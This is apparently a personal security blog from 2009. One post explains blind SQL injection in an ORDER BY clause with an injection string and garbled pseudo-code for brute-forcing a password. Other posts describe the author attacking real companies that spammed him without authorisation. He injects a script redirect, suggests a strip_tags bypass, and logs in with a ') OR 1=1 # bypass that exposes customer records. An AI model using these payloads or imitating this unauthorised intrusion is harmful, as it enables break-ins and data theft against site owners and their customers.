SQL Injection inside the ORDER BY clause

Woo I never really did any research in SQL injection inside the ORDER clause . Apparently if you get nothing on your screen, bruteforcing is basically the only way, but how to go about.. Especially if the injection is basically blind we need something that will make sql break..

For example if we have the query: SELECT * FROM users ORDER BY username {injection}

We got raw access to this query by changing ASC or DESC into anything we want.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --

There are two things that could happen... If the query executes normally you know that the first character of the password is 50 (ASCII value)

Please note that you do need only 1 record, if you have multiple or cannot escape the limit clause you might want to use a subquery instead of direct ASCII(SUSBSTRING()) method..

Anyway back to the query, if the character is incorrect the following message will appear if mysql_errors() are printed: Subquery returns more than 1 row

So basically you need to write an exploit that once a query has been executed properly it moves to the next character and remembers the previous character..

In pseudo code something like

function get() {
define charset
define emptypassword
define sql_injection_url_and_string

for i = 1 ; i < x =" 0;x">post(sql_injection_url_and_string)) {
// The query was succesful
emptypassword + charset(x); // the character that matched to the string
break; // move to the next position
}

}

}
print emptypassword;
}

I applied this method for finding table names and columns from the information_schema.tables and .columns...

This kind of SQL injection I enjoy the most. It's not as easy as the union select command.. It requires some thinking and writing an exploit..

'HACKLAMER'

Well, two blokes decided to create a new service which made it possible for people to digitally send invoices. Ok, nice, thanks for telling me, I really don't care. If I need something I'll google it. Don't email me with fancy links that register if a spam email was succesful. I don't like that. Sooo here we go again..

The email contained links to their service, however inside the link my email address was stored. So they want to know if they should send me more email? or maybe to see how many of the emails they sent succesfully pulled the users to their website.. anyway I decided to see if the site was secure .. and after some testing I concluded the normal approach didn't work that well.. they clearly took care of the most common vulnerabilities.. So I had to think outside the box and thought, what do they do with the email addresses they register.. Right it has to show up somewhere.. most likely they made a fancy interface for it! Woo And they probably never thought of escaping that .. so I injected: ?id=<script>window.location='http://www.mywebsite.nl'</script>

And guess what, within 20 minutes of the injection I got an email from one of the dudes telling me that my "failed" hack attempt has been reported to the police..

In what way did it fail. It might not have executed the script but the result was exactly the same. He payed a visit to our website. Thank you, come again!

Of course you can understand I analyzed his email and IP address it came from, I made the mistake of not getting the IP's behind a proxy. Yup he used a proxy to send me an email. Chicken!

Oh and he blocked my IP for every one of his sites! brr...

Here's what he sent: (dutch)

Berichtveld: We zullen aangifte doen van uw (mislukte) hack poging op onze website.

30-03-2009 17:27 - HACKLAMER (x.x.x.x): Viewing demo (\')
30-03-2009 17:32 - HACKLAMER (x.x.x.x): Viewing demo (window.location=\'http://www.mywebsite.nl\')
30-03-2009 17:33 - HACKLAMER (x.x.x.x): (window.location=\'http://www.mywebsite.nl\')
Telefoonveld:

IP adres: 194.109.22.147
Taal geselecteerd: Nederlands
Tijd: 17:42 - 30 Mar 2009

The ip will resolve in xs4all.nl proxy.

He was nice enough to report the log which indicates he uses a self made system, since I don't know any tool that will call someone a 'hack lamer'. Anyway the tool strips tags .. Now that is not save my friend. I wonder if:

<scr<script>IPT>window.location='http://www.mywebsite.nl'</SCR</script>IP>

would have worked. Since strip_tags() would be kind enough to concatenate the script tags for me.. To bad the quotes are being escaped. Something lame like <plain<plaintext>text> would have been annoying in that case being tagged: 'hack lamer' would suit ;)

But I'm not there to break things just to notify people!

hah sending 50k emails a day ?

Today, I got an email from a company which will print your lovely designed business card for an outrageous amount of money.. Now getting an email isn't that bad however I got the email 3 times in the last 2 months. Which is in my opinion to much! So I decided to inspect the email a bit closer.. and I noticed that they used a website who sells these kind of mailing lists.

I'm in it! no! AhH get me out .. wait.. lets check their website first..
wow.. 9 errors all based on file inclusion as sql injection..

So I managed to get to their login page and just trying to enter with username ' and password ' gave me the following error

SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1

How nice of them, printing the entire query for me! The first thing you might notice is why the hell are they escaping the password but not the username... why?????!??

So looking at the query,

') OR 1=1 --

Should do the trick you'd say... nope it didn't.. Apparently they disabled the comment tags -- and \* But luckily we have a third. yes! it's the # !

') OR 1=1 #

That let me in with full access to all their customers.. I could see who sent what email and to whom. This company I got the email from sent around 50k emails a day which is like lol.

Anyway I reported the error and they said they fixed the 'bug', they thanked me and told me they removed my email address.. The email address I used to sent them an email wasn't even in their database.. Good job. So I replied back to remove the entire mywebsite.nl range.

My first entry

Allright, this will be my first blog item.. The reason why I decided to create a blog is that I enjoy sharing my experience and techniques with others.

So here's my first blog item. A little introduction is in place, my name is Wim Wisselink, I'm currently still studying and I run my own company with a friend who's main focus is making sure that our bank account is not empty!

I'm basically the lead-programmer and the one who gets the blame when something breaks. Nevertheless I enjoy my work as a programmer. I do enjoy my work as a penetration tester even more. The moment a server show's an error I get a thrill. The thrill of exploiting it and no... not abusing it... but report it.

I often get spam mail which sends me to their website and tell me to buy their product, instead I check their website for vulnerabilities and I make them a counter proposal. Untill now.... it never worked. To bad... So I tried a new approach. Don't bother trying to benefit from it just tell them what the problem is and they might cut you in on a deal...

Anyway so far my first entry